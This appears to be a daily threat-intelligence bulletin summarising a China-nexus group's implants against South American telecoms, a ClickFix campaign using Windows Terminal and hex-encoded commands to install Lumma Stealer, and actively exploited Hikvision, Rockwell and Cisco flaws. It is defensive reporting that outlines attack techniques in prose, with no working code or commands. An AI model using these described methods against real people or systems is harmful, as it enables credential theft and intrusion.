Cyware Daily Threat Intelligence, March 06, 2026

The threat landscape is witnessing a convergence of high-level state espionage and deceptive social engineering tactics aimed at critical infrastructure and administrative tools. In South America, the China-nexus actor UAT-9244 has been observed targeting telecommunications providers using a sophisticated trio of implants.

Deceptive social engineering has evolved to weaponize trusted system utilities, as seen in a new ClickFix campaign that specifically exploits the Windows Terminal app. By instructing victims to execute hex-encoded commands directly within the terminal, attackers bypass traditional "Run" dialog detections to deploy Lumma Stealer.

The persistent risk of legacy vulnerabilities remains a critical concern for industrial and physical security, with CISA adding two long-standing flaws in Hikvision and Rockwell Automation to its KEV catalog. CVE-2017-7921 and CVE-2021-22681 are currently being exploited to bypass authentication and escalate privileges in sensitive environments.

Top Malware Reported in the Last 24 Hours

UAT-9244 targets South American telecoms

UAT-9244 is a China-nexus APT actor that has been targeting South American telecommunications infrastructure since 2024. This group employs three primary malware implants: TernDoor, PeerTime, and BruteEntry. TernDoor, a variant of the CrowDoor backdoor, uses DLL side-loading for infection and incorporates an encrypted Windows driver for process management. PeerTime is an ELF-based backdoor utilizing the BitTorrent protocol, enabling it to infect various architectures and execute commands through a peer-to-peer network. BruteEntry functions as a brute-force scanner, converting compromised devices into operational relay boxes to attack SSH, Postgres, and Tomcat servers. Each implant showcases sophisticated techniques for evasion and persistence, indicating a well-coordinated effort to compromise critical telecommunications systems.

Microsoft unveils new ClickFix malware campaign

Microsoft has disclosed a new ClickFix campaign that utilizes the Windows Terminal app to deploy Lumma Stealer. This campaign instructs users to launch Windows Terminal directly, creating a more trustworthy environment for executing malicious commands. By bypassing traditional detection methods aimed at the Run dialog, attackers exploit Windows Terminal to guide victims into executing hex-encoded commands that trigger a multi-stage attack. This process includes downloading a ZIP payload, extracting files, and establishing persistence through scheduled tasks. Lumma Stealer targets high-value browser artifacts, harvesting stored credentials and exfiltrating them to attacker-controlled servers. Additionally, a secondary attack pathway involves downloading batch scripts to execute further malicious actions.

Top Vulnerabilities Reported in the Last 24 Hours

CISA adds flaws to KEV catalog

Two critical vulnerabilities affecting Hikvision and Rockwell Automation products have been added to the KEV catalog due to evidence of active exploitation. The first vulnerability, CVE-2017-7921, involves improper authentication in multiple Hikvision products, allowing attackers to escalate privileges and access sensitive information. The second, CVE-2021-22681, relates to insufficiently protected credentials in Rockwell Automation’s Studio 5000 Logix Designer and related controllers, enabling unauthorized users to bypass authentication and alter configurations. 

Actively exploited Cisco flaws

Cisco has confirmed the active exploitation of two vulnerabilities in its Catalyst SD-WAN Manager software, identified as CVE-2026-20122 and CVE-2026-20128. The first vulnerability, with a CVSS score of 7.1, allows an authenticated remote attacker to overwrite arbitrary files, while the second, scoring 5.5, enables an authenticated local attacker to gain user privileges. These vulnerabilities require valid credentials for exploitation. Cisco released patches for these issues across various software versions after observing a significant spike in attacks on March 4, 2026, with increased activity noted in the U.S. Additionally, Cisco addressed two critical vulnerabilities in its Secure Firewall Management Center, both scoring 10.0 on the CVSS scale.